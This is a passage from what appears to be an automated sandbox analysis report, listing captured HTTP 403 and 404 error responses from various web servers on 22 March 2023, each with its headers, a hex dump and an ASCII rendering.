20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:44:37 GMTContent-Type: text/htmlContent-Length: 0Connection: keep-aliveX-Powered-By: PleskLin
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:37 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMcVCNBFLDC86+VsazPJgXnP,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=X-Wix-Request-Id: 1679460277.6283544764821362X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:44:37 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:37 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jK0gK1D6AikuCs2lSscKag0ObrBIvHfD1TOZ1Ghhywj%2FFTDF%2FPdO%2B7hmAg6cK5wlnv0TW4PiEOBd9S85IcryqAEpF9bvTTWYtwXEhlGN%2BTrHZjp%2FGLgzM9kGDFAPn82o"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc7d00ab15c1a-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: namecheap-nginxData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:38 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZYCszWMDZNgg%2Fs6fgM%2FGX5CkQrj1jXyPmKHKA72HbG7HWWGKqq8sVsxUNYZKx%2B%2Fp9HEsp8sb0AHxGycixbvAlfavlTgQyTkiMFK1TaLwJ0YaONMZsCA71%2F%2Bn%2FWthY6Ow"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc7d1abeb5c1a-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 22 Mar 2023 04:44:45 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:39 GMTServer: ApacheLast-Modified: Fri, 10 Jun 2022 17:11:43 GMTETag: "2c8-5e11b08540544"Accept-Ranges: bytesContent-Length: 712Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 69 2d 4d 53 43 50 20 69 6e 74 65 72 6e 65 74 20 2d 20 4d 75 6c 74 69 20 53 65 72 76 65 72 20 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 20 2d 20 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 2d 4d 53 43 50 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 69 6e 64 65 78 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 65 72 72 6f 72 64 6f 63 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 28 49 45 20 37 29 7c 28 49 45 20 38 29 5d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 69 65 37 38 6f 76 65 72 72 69 64 65 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6f 75 74 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 69 6e 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 33 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 62 61 63 6b 6c 69 6e 6b 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 67 6f 28 2d 32 29 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 42 61 63 6b 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <title>i-MSCP internet - Multi Server Control Panel - Error 403</title> <meta charset="utf-8"> <meta name="application-name" content="i-MSCP"> <meta name='robots' content='nofollow, noindex'> <link rel="icon" href="/errors/inc/favicon.ico"> <link rel="stylesheet" href="/errors/inc/errordocs.css"> <!--[if (IE 7)|(IE 8)]> <link rel="stylesheet" href="/errors/inc/ie78overrides.css"> <![endif]--></head><body><div id="outer"> <div id="inner"> <h1>Error 403</h1> <p>Fo
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 22 Mar 2023 04:44:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15015X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: BNP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 64 38 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 22 Mar 2023 04:44:40 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
